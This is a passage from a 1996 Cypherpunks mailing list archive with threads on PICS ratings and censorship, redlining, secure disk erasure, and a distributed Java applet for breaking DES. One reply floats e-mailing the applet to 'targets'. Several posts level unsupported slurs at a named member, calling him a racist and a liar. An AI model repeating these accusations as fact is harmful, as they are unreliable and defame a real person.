almost certainly would not have to be self-rated...unless I said "Fuck," in
which case I'd better consult the various PICS ratings and pick one to
protect me to the maximum extent...I consider this scenario probable if the
CDA is upheld and a major step away from "free speech" and "cabeat emptor"
and a step toward wide self-suppression of controversial speech.)

So, these are various examples of "swords of Damocles." That is, systems or
technologies which are so potentially dangerous to deploy--in the sense
that governments, do-gooders, and lawyers are so tempted to make them
mandatory or to use coercion to drive out alternatives--that we should try
to anticipate the Damoclean dangers of such technologies and work to head
off such futures.

Cypherpunks don't trust governments which say "Trust us" or "We're here to
help." Governments, like that king in the myth, can cut that threat holding
up that sword with little effort.

"The Position Escrow System is voluntary. Citizen-units who wish to wear
the Localizer (tm) are encouraged to do so, This has been shown to help the
police in deterring kidnappings and is helping rescue units find lost
hikers and skiers. Those citizen-units who wish not to cooperate in such
efforts are free at this time to be rogues, but rogue-units will of course
be treated with more suspicion and the failure to wear a Localizer (tm) may
of course, as the Supreme Court ruled in 2003, be considered probable cause
for a search. And since there are now twice as many laws as there were in
1996, most citizen-units are choosing not to be rogue-units."

--Citizen-Unit Timothy C. May
ID: 7734%-sd123227-666
Location at 19:09 UCT: 37 02 30 N / 121 48 45 W


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 12:02:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
In-Reply-To: <Pine.SUN.3.94.961210090234.4477A-100000@polaris>
Message-ID: <sDiqyD106w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:

> > That, essentially, is what a bank is.  I do not believe the government
> > should dictate which people you, or your bank, are allowed to lend to.
>
> Create a bank where the identity of the customers are unknown and you
> solve the redlining problem.

Supposedly in redlining the bank discriminates based not on the race of the
loan applicants, but on the location.  If they're unwilling to lend money
to buy a house in a "bad neighborhood" at the same interest rate they use
in a "good neighborhood", then chances are that they don't look at the
identify (race, income, etc) of the customers - only at the address.

I hope you're not suggesting that a bank should accept a house as collateral
without knowing there that house is. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Tue, 10 Dec 1996 14:34:24 -0800 (PST)
To: <jfricker@vertexgroup.com>
Subject: Re: Secure Erase for PCs?
Message-ID: <199612102235.RAA29568@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> >	Though, technically, no disk can be securely erased, my program,
	Read Peter Gutmann's paper on securely deleting files at:
http://www.cs.auckland.ac.nz/~pgut001/secure_del.html.

> > Very Good Privacy, can securely delete files after they have been
encrypted.
> 
> Thought you said "no disk...". So how does VGP do it?
	I should have added quotes around "securely delete." The end of Peter
Gutmann's paper states "it is effectively impossible to sanitise storage
locations by simple overwriting them, no matter how many overwrite passes
are made or what data patterns are written. However by using the relatively
simple methods presented in this paper the task of an attacker can be made
significantly more difficult, if not prohibitively expensive." VGP tries to
make is prohibitively expensive (that is, in essence, what all ciphers do;
someone can break just about any cipher if they have enough money).

VGP can be downloaded at: http://www.geocities.com/SiliconValley/Pines/2690
If you have any questions, please e-mail vgp@cryogen.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Tue, 10 Dec 1996 14:35:34 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: The product formerly known as VGP
Message-ID: <199612102238.RAA29779@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


	I am just announcing that I am changing the name of my program, Very Good
Privacy (distinct from Pretty Good Privacy) in response to a complaint from
PGP, Inc. It was cool, though, because I got an e-mail message from Phil,
which is akin to talking with God. Just to quell the trademark questions
some people might have, a trademark violation is defined as something where
there is a possibility of confusion with another product; as made obvious
by the hundreds (literally) of messages I have received asking about the
features of this new version of PGP (which it is not). I have not changed
the name of the product on the web page, and will just post a notice of
clarification until I think of a new name. Does anyone have any ideas?
Thanks.


The product formerly known as VGP can be downloaded at:
http://www.geocities.com/SiliconValley/Pines/2690
If you have any questions, please e-mail vgp@cryogen.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Tue, 10 Dec 1996 06:15:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
Message-ID: <4484.9612101411@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Tim May <tcmay@mail.got.net> writes:
> If it's only a contract, and forever only a contract, then I am less
> worried. But my point is that I fear the purely contractual status will not
> last.

This point is something that we can agree on completely. But the question 
is should be approach it from a 'compromising' point of view encouraging 
completely volentary contracts or wait for the government to attempt to 
mandate a system. Although ideal we should fight against any form of
censorship  I think that the public are generally ignorant enough to say 
'well it works with films so why not with web pages' when faced with the 
four horsemen.

> (And, as I think it was Lucky Green who pointed out, what is to stop people
> who have _not_ entered into any contract with one of the (several?) PICS
> agencies from simply claiming a rating? If the PICS folks want to set up a
> system for digital signatures, compliance testing, etc., fine...so long as
> non-customers don't have to pay for it. Let the Hallelujah Brigade and the
> Dervishes subsidize their systems.)

Again I was thinking more along the lines of having the PICS system similar
to british standards where claiming to have something that you do not is 
illegal. However I think that your idea, although put forward facetiously,
is actually ideal. People currently pay for web-blockers so why should they
not buy web browsers that allow restricting (for their own children of 
course) which web sites etc they can reach from digitally signed ratings
on pages. Initially browser sales could pay for web ratings (much as they
currently pay for researching which sites should and should not be allowed
into things like surfwatch), once the browsers themselves become widespread,
and view per page (or even site) automatic charging comes into use then 
such an organisation could even charge to review your web pages - if you do
not like their evaluation then just do not use them.

> >> If I believe pictures of people having sex should be marked "Suitable for
> >> all ages" (or whatever the Official PICS Status Code is) will I be
> >> criminally or civilly in danger? If so, then PICS is a ratings system which
> >> individuals are likely to be unable to interpret themselves.
> >
> >What if the PICS classifications were worded so as to describe the factual
> >content of a page rather than the writers opinion of its suitability? This,
> >if correctly implemented, could remove the problem of interpretation.
> 
> Doubful. I contend that any such approach is bound to fail.
> 
> Suppose I describe a picture of adults having sex as "A joyful experience,"
> or "Children need to look at this!"?
>
> There simply is no "factual" description of a page. Every person will have
> their own descriptions. Mandating that words be "true" is the end of free
> speech as we know it.

I was starting from the point that there were a number of officially (by 
the PICS organisation) recognised PICS labels each of which had specific 
definations in a similar manner to existing HTML tage.. Nothing would stop 
anyone from making up their own new tags but browsers could only assume that 
the official ones would be strictly defined.

> (For starters, religions--all of them--will have to be shut down.)

This is a bad thing? (;->)

> >> (This takes the element of intent to deliberately defeat PICS out of the
> >> equation, and asks if "innocent mislabeling" or "philosophical disagreement
> >> alternate labeling" will expose the mislabeller to charges.
> >
> >Factual classifications should completely remove the problems of innocent
> >mislabeling and philosophical disagreement (if you disagree don't label but
> >if you use our labels follow our rules). I would never claim to be a lawyer
> >but from my naive point of view I would say that putting false labels on a
> >page would be misrepresenting it and could possibly constitute fraud?
> 
> Fraud? What happened to free speech? The assumption that there even exist
> "factual descriptions" (and presumably "false descriptions") is an
> incredibly pernicious idea, at least as regards free speech.

Not having a detailed knowledge of the American right to free speach I can
only go on my opinions, but lieing with the intent to defraud would almost
certainly be illegal over here. The solution for this of course goes right 
back to reputations and digital signatures.

> If I wish to describe two people having sex as "Two happy persons engaged
> in a happy pursuit," this is not "fraud." True, many parents will dislike
> it, as will many Mennonites, etc. So?

But these would not be 'Officially Recognised tags' so would essentially mean
nothing. How to inforce the Official Recognition is another matter and I 
believe that your sugestion of digital signatures would fit the bill 
(although it does introduce the problem of another person rating your work -
you must either accept their 'Official' rating or do without (or find another
company that rates your work in the way that you wish)).
 
> >> What I see with any such enforcement of PICS standards is yet another Full
> >> Employment Act for Lawyers, and the Lawyer's Guild will be oh so happy to
> >> see PICS essentially made part of the bureacratic morass:
> >>
> >> "Due to the complexities of the PICS ratings system, and varying community
> >> interpretations of the elements of PICS, we advise that no person post
> >> anything to the Net with a PICS rating without seeking competent legal
> >> advice from a PICS-licensed legal professional."
> >
> >Unfortunately this may be the case, however I would suspect that this may go
> >the other way with people thinking that if they can be sued for mislabeling
> >their pages they just will not label them at all.
> 
> Of course, the most correct and consistent view is to just leave it for a
> market solution: some label, some don't, some label carelessly, some label
> anally [no content is implied! :-}), some label deceptively, some label
> clearly, and so on.

A market solution with a number of different labeling organisations, and
labels validated by digital signatures would be idea.... if you want what
your child sees to be decided by ratings assigned by the "good mothers of
america' or the 'porn hunters of the UK' then it is up to you.

> Again, my concern is not that some bunch of folks initiate a PICS or SICS
> or LIKS system, but that it the legal system gets involved...I surmise that
> many lawmakers are already talking about this--this came up in connection
> with the CDA case, that a labelling system such as PICS could resolve some
> of the issues....I hardly expect that a fully voluntary system would meet
> the demands of the censors.

I agree, the censors will at an absolute minimum want everything labeled in
such a way that they can get rid of anything that they deam 'inappropriate'.
This means a centralised authority and everyone getting all of their pages
labeled. Thankfully, given the size, complexity and multi-jurisdictional
nature of the web (and internet in general) this is simply not practical,
and I believe that it should be possible to persuade them so. The only way
for them to achieve anything near their ends would be a widely deployed 
rating system backed by digital signatures and browsers capable of 
recognising these signatures and labels and descrimingating based on them.

The only disadvantage that I can see to such a system would be that it would
make it easier for goverments, corporations and other organisation from 
passing through their servers and routers allowing wide scale sensorship.
This should be prevented by having a number of rating organisations slowly
gaining popularity (overall they must be popular or parents blocking 
unrated would be unacceptably restrictive). There would be nothing to
stop a page having ratings from a number of organisations or infact from
none at all.

Jon Baber
jbaber@mi.leeds.ac.uk
http://chem.leeds.ac.uk/ICAMS/people/jon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Tue, 10 Dec 1996 07:42:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
Message-ID: <4496.9612101529@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally <m5@vail.tivoli.com> writes: 
> jbaber@mi.leeds.ac.uk wrote:
> > 
> > Not having a detailed knowledge of the American right to free 
> > speach I can only go on my opinions, but lieing with the intent 
> > to defraud would almost certainly be illegal over here. 
> 
> So where lies intent to defraud in the act of deliberately 
> mislabeling a web page?  Why is that any different from me 
> standing on the street corner (or at Hyde Park Corner) announcing
> that I'm the Messiah?

I seem to have edited the previous message badly and left out the
context which was false labeling on pages for which there was a 
charge to view. More along the lines of false advertising to be sure
but still fraud in my opinion.

Also, of course, it would be very hard to show that you were not,
in fact, the Messiah (;->).

Jon Baber
jbaber@mi.leeds.ac.uk
http://chem.leeds.ac.uk/ICAMS/people/jon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 12:50:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Patriots should use PGP
In-Reply-To: <3.0.32.19961210104240.006dd358@super.zippo.com>
Message-ID: <oVmqyD110w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Byrd <byrd@ACM.ORG> writes:

> Why on earth would an American football team need PGP?

If they negotiate fixing a game and don't want anyone to find out...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Tue, 10 Dec 1996 15:31:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Secure Erase for PCs?
Message-ID: <19961210233018452.AAA215@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter's paper is an interesting overview of data recovery technology. He does 
conclude that his 35 write regiment will overwrite all signals on hard disk 
media. It would seem that performing the 35 writes multiple times would yield 
an securely erased drive. Yet he clearly is not an expert in data recovery, is 
organizing others research, and does not provide evidence or tests for his 
postulates such as the need for a good PRNG. It would be quite interesting to 
send a disk off to a data recovery company after running through Peter's method 
with perhaps different parts of the disk treated differently. 

Also, the section on RAM talks about data persistance but does not cover 
recovery methods other than SRAM power up bias. Nor is the RAM section 
referenced. RAM is so active that it would seem little pertinent data could be 
recovered if any.

So, in spite of not being an expert myself I am not convinced that any very 
well funded entity can recover data that has been overwritten an arbitrarily 
large number of times. Of course the relative value of my personal data is low 
and my level of paranoia follows. One can not be called reactionary by 
recommending a "no-trust" policy. 

Reading the paper reminds me how long ago it was that I studied the physics of 
microelectronic devices. Yow!


>Bill Frantz (frantz@netcom.com) said 
>At 8:05 PM -0800 12/9/96, John Fricker wrote:
>>>	Though, technically, no disk can be securely erased, my program,
>>
>>Sure it can. Ten overwrites will rendered remnant data obscure. So says the
>>electron microscope waving data recovery experts anyway.
>
>You should really check out Peter Gutmann's paper in the 1996 Usenix
>Security Conference Proceedings.  After reading it, I think you will come
>to the conclusion that the only secure data destruction technique, against
>a well-funded attacker, is destruction of the disk.  I like thermite myself.
>
>
>-------------------------------------------------------------------------
>Bill Frantz       | I still read when I should | Periwinkle -- Consulting
>(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
>frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA
>

--j

---------------------------------------------------------------------------------
------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending 
| me email with subject "send pgp key".
| www.Program.com is a good programmer web site.

--------------------------------------------------------------------------------------------------------
-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 12:53:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <4496.9612101529@misun2.mi.leeds.ac.uk>
Message-ID: <kymqyD111w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jbaber@mi.leeds.ac.uk writes:
> > So where lies intent to defraud in the act of deliberately
> > mislabeling a web page?  Why is that any different from me
> > standing on the street corner (or at Hyde Park Corner) announcing
> > that I'm the Messiah?
>
> I seem to have edited the previous message badly and left out the
> context which was false labeling on pages for which there was a
> charge to view. More along the lines of false advertising to be sure
> but still fraud in my opinion.
>
> Also, of course, it would be very hard to show that you were not,
> in fact, the Messiah (;->).

Claiming that you're the Messiah might get you and your followers burned.
Remember David Koresh?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 13:51:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <32AD8E70.41C6@hammerhead.com>
Message-ID: <P7oqyD112w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Thaddeus J. Beier" <thad@hammerhead.com> writes:

> Timothy C. May wrote:
>
> > If it's only a contract, and forever only a contract, then I am less
> > worried. But my point is that I fear the purely contractual status will not
> > last.

Timmy May is a disgusting low-life - a true human garbage slimeball.

> I completely agree, if the labels, and their format, are mandated, then
> it is
> a bad thing.

Most WWW browsers won't understand your HTML if you choose not to use
the <HTML>, <BODY>, <HEAD>, etc tags.  If you think that's censorship,
you should write your own browser. :-)

(Just trying to replicate the "logic" of Gilmore defenders here.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Tue, 10 Dec 1996 13:25:42 -0800 (PST)
To: "Ray Arachelian" <sunder@brainlink.com>
Subject: RE: Java DES breaker?
Message-ID: <n1361887363.97227@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


A few small bugs in this idea, at least for the masses --

1) This would only appeal to people who have unlimited usage

2) ...and don't care about not having their phone available (I know they're
asleep at the time)

3) ...and don't have an ISP that will kick them off when a timeout period
expires.

...But if you implement it in a way where the user can hang up the phone and
leave the browser on with the applet running, that would probably work.  It
would be easier to use than downloading executable code and a keyspace
manually...

PM

_______________________________________________________________________________
From: Ray Arachelian on Tue, Dec 10, 1996 15:57
Subject: Java DES breaker?
To: cypherpunks@toad.com

Here's a thought,

While Java isn't a workhorse performance wise, it's very simple for 
anyone with a half decent browser to use java applets.  Writing an 
implementation of DES in Java should be fairly easy, however it will run 
slow on most browsers.  This performance drop will make it far easier for 
Joe Webuser to easily help break DES for us.

Previous efforts at breaking DES and RSA have done quite well, but the 
number of people involved can be greatly increased if you tell someone 
just go to this page and leave your browser on overnight, every night.

The applets would get a key range from the server, process them, and 
return a yeah or nay back for however far they manage to process before 
the user returns in the morning.

With JIT's (Just In Time Compilers) and the sheer numbers of users that 
this can attract, the efforts at breaking weaker cyphers can be increased.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================


------------------ RFC822 Header Follows ------------------
Received: by mail.ndhm.gtegsc.com with SMTP;10 Dec 1996 15:57:37 -0400
Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP;
          Tue, 10 Dec 1996 20:57:29 GMT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id IAA21427 for
cypherpunks-outgoing; Tue, 10 Dec 1996 08:23:56 -0800 (PST)
Received: from beast.brainlink.com (sunder@beast.brainlink.com
[206.127.58.17]) by toad.com (8.7.5/8.7.3) with ESMTP id IAA21422 for
<cypherpunks@toad.com>; Tue, 10 Dec 1996 08:23:53 -0800 (PST)
Received: (from sunder@localhost) by beast.brainlink.com (8.8.2/8.6.12) id
LAA01432; Tue, 10 Dec 1996 11:26:19 -0500 (EST)
Date: Tue, 10 Dec 1996 11:26:19 -0500 (EST)
From: Ray Arachelian <sunder@brainlink.com>
To: cypherpunks@toad.com
Subject: Java DES breaker?
Message-ID: <Pine.SUN.3.91.961210112058.1282A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Tue, 10 Dec 1996 15:02:25 -0800 (PST)
To: Mullen Patrick <Mullen.Patrick@mail.ndhm.gtegsc.com>
Subject: Re: Java DES breaker?
In-Reply-To: <n1361887363.97227@mail.ndhm.gtegsc.com>
Message-ID: <32ADEBC6.7255@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Mullen Patrick wrote:
> 
> ...But if you implement it in a way where the user can hang up the 
> phone and leave the browser on with the applet running, that would 
> probably work.  It would be easier to use than downloading executable 
> code and a keyspace manually...

I think that's the most likely way to do it.  You'd write a little
applet that'd just chug away, and could perhaps periodically try to 
connect back and deliver results.

Note that you could do it by e-mail too, if your targets read e-mail
with Netscape (or maybe IE; I don't know if it runs applets in the
mail reader when it gets a text/html content mail message).

^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
Mike McNally -- Egregiously Pointy -- Tivoli Systems, "IBM" -- Austin
mailto:m5@tivoli.com    mailto:m101@io.com    http://www.io.com/~m101
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Tue, 10 Dec 1996 09:18:02 -0800 (PST)
To: Dale Thorn <cypherpunks@toad.com>
Subject: A New First on this List
In-Reply-To: <32AD7D31.6DBD@gte.net>
Message-ID: <199612101719.KAA16046@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <32AD7D31.6DBD@gte.net>, on 12/10/96 
   at 07:09 AM, Dale Thorn <dthorn@gte.net> said:

:: Anonymous wrote (after rude cartoon)
::
::> All joking aside, is there any reason I shouldn't trust Tim May 
::> (assuming I don't care about his personal details like sexual
::> preference, etc.)?
::
::You would be well advised not to trust *anyone* unless:
::
::1. They have *your* personal interests at heart (not likely here)
::
::   -or-
::
::2. It is necessary for you to trust them for a particular reason,
::   and you feel that you can justify the risk (more likely).
::

    actually, two [recent] new firsts on this list!

    1.  Dale is polite.

    2.  Dale is reasonable.

    does that mean:

        "A gentleman is a man who knows _when_ to be rude"
            --Oscar Wilde

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMq2bEL04kQrCC2kFAQFtVgQA3c8h5EBRIqGsb5ac7jy930nogtgOZgsd
z92PUinyG188NvJzc6fuZp64P7FBbH/WB/ctBxyui+bsATWVAcxkxh4tHyp9+kbn
suYv8u2+1OzqP0F/gCI7Y18kCRZg6P98zaE/5iYzpjUWVkSeKpAPE8t8qFyUyK+I
EOrq9UcT6Zw=
=B81i
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Tue, 10 Dec 1996 15:03:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: cypher-PUNKS...
Message-ID: <199612102303.RAA20254@cdale3.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: dlv@bwalk.dm.com, cypherpunks@toad.com
Date: Tue Dec 10 17:03:21 1996

Dimitri hath written... (and the killfiles sang...)

> > That charge is every bit as foundless as the charges that you are
> > responsible for the "A Daily Warning Regarding Tim May" posts
> > of a while back, or the current round of remailed messages featuring
> > the sickeningly cutesy ASCII graphics at the bottom.
> Tim must have been a heinous baby...

I would call this a non sequitur, but I can honestly say that
I have no idea what the hell that sentence is supposed to mean.

> The real identities of people who use the "anonymous" remails to send 
> out "homophobic" or otherwise "politically incorrect" materials are 
> frequently disclosed on the "remailer-operators" mailing list. For 
> example:
> 
> ]To: remailer-operators@c2.net
> ]Someone who proports to be from ******************* is sending out a 
> ]huge spam/mailbomb right now.  I suggest you sourceblock the prick 
> ]now.

How did you translate "huge spam" into "homophobic"?  Are
you using the Windows translation of the Russian character
set, or what?  You are obviously seeing something that
just ain't there.

dave

- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"Remember: King Kong died for your sins" - Principia Discordia
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMq3sRnEZTZHwCEpFAQF7GAf+JvaozDbAgY+kXv2dhi8Z43i1XusRzRzK
gvJmWF5gafgdxWyBiBxjuEYNdca24jreIVWG8YbSSauvl2xt4al/jzhGLoOcBAC1
7KwydcwaEn3p1vkRmp4rwT8gxQ/Nb68z1NYZzktBxl3/Evo2kgUCkVG6xpAUBixA
LKKtMAmiZlqqiTYmB/Se+RMBPjhgiGsuAosca7S/Ia3m2f7mBmyKAB7khcbgHUJ8
ARr9zfj4+pykt9z0W6SCPlxMoXNzu1ozmmHIojDVMBSAY26reGNWkLclLSrOCzyU
pktVLlVMyL95TKjXomByCuNC9Dp23wHmCBKQufNRQN70c87eIbh09A==
=L6ZG
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 14:51:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A New First on this List
In-Reply-To: <199612101719.KAA16046@infowest.com>
Message-ID: <TcRqyD113w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com writes:
>
> In <32AD7D31.6DBD@gte.net>, on 12/10/96
>    at 07:09 AM, Dale Thorn <dthorn@gte.net> said:
>
> :: Anonymous wrote (after rude cartoon)
> ::
> ::> All joking aside, is there any reason I shouldn't trust Tim May

Timmy May is a Jew-hating liar.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 10 Dec 1996 17:12:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP 3 Beta testers needed
In-Reply-To: <ew3PyD91w165w@bwalk.dm.com>
Message-ID: <199612110108.RAA31207@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> lucifer@dhp.com (Anonymous) writes:
> > All joking aside, is there any reason I shouldn't trust Tim May
> > (assuming I don't care about his personal details like sexual
> > preference, etc.)?
> 
> Timmy May is a racist (especially hates Jews) and a proven liar.
> Perhaps this doesn't bother you.

The "proven liar" thing doesn't really bother me if I don't know what
he lied about and why.  I mean people say things which are untrue all
the time, but often by mistake or as a joke.  It's always possible for
some people to misinterpret what someone is saying or get really upset
about it when most people just don't think it matters.

The charges of racism and anti-semitism seem a bit more serious.  I've
been subscribed to cypherpunks for a couple of years, and have not
seen any evidence of such an attitude on the list.  I therefore find
the charges difficult to believe.  However, I'm willing to investiate
further if you point me in the right direction, as I'd like to know
about it if Tim May truly is some kind of horrible person.

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jw250@columbia.edu>
Date: Tue, 10 Dec 1996 14:38:29 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Redlining
In-Reply-To: <32AD7FA4.4C47@gte.net>
Message-ID: <Pine.SUN.3.95L.961210172610.29109A-100000@ciao.cc.columbia.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Dec 1996, Dale Thorn wrote:

> The logical implication here is that a thousand people "getting together"
> and doing something is no different in principle than one person doing
> that something.  Not a valid implication, although the result is not
> necessarily false on a per-case basis.

Actually, I think this is a very valid implication.  One of the main ways
in which statist societies justify their restrictions on individuals is by
reifying large bodies of individuals and giving them their own rights and
responsibilities _as_a_seperate_entity_.  To speak of a mass of individuals,
whether you call it a corporation, a collective, or a government, as having
a different set of rights than the individuals who make it up, is the
heart of statism.

> Ironically, discrimination, prejudice, bigotry, hate, etc. are often
> judged by the public on a "gut level" as well.  It's just a matter of
> how to "educate" the public to see these things.

Exactly.  Like most, I have a strongly visceral negative reaction to bigotry.
I wish there could be a system of law which contained it.  There cannot, or
at least not without doing even more harm.

What will contain bigotry is education and example which inculcate this same
visceral response to the destructiveness of bigotry.  Unfortunately, statist
systems (and IMHO especially those of a cpaitalist nature) thrive on turning
subsets of society against each other, so that the populace are to busy to
turn against the state.

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Tue, 10 Dec 1996 17:47:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <199612110147.RAA24444@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 5:37 PM 12/10/1996, Jim Wise wrote:
>On Tue, 10 Dec 1996, Dale Thorn wrote:
>
>> The logical implication here is that a thousand people "getting
>> together" and doing something is no different in principle than one
>> person doing that something.  Not a valid implication, although the
>> result is not necessarily false on a per-case basis.
>
>Actually, I think this is a very valid implication.  One of the main
>ways in which statist societies justify their restrictions on
>individuals is by reifying large bodies of individuals and giving
>them their own rights and responsibilities _as_a_seperate_entity_.
>To speak of a mass of individuals, whether you call it a corporation,
>a collective, or a government, as having a different set of rights
>than the individuals who make it up, is the heart of statism.

Naturally, I agree with Jim.

To expand on his comments, if it is acceptable to lend your money to
whomever you like, surely it must be acceptable to lend your money to
other people on whatever terms you like.  These terms could be "I will
lend you this money on the condition that you lend it only to
pure-blooded Albanians."

The reason organizations are subjected to controls has only to do with
what is feasible.  The people who want to control these organizations
would be quite happy to dictate to individuals what they may do with
their money.  Fortunately, this is not practical.

Historically, many societies have not allowed the formation of
organizations without governmental approval.  For instance, in
pre-Revolutionary France, it was not even possible to form a club
without official sanction.  The Monarchy made a major concession when
it permitted the free formation of clubs.  It may also have been a
strategic blunder, as the clubs immediately became the focus of
Revolutionary political activity.

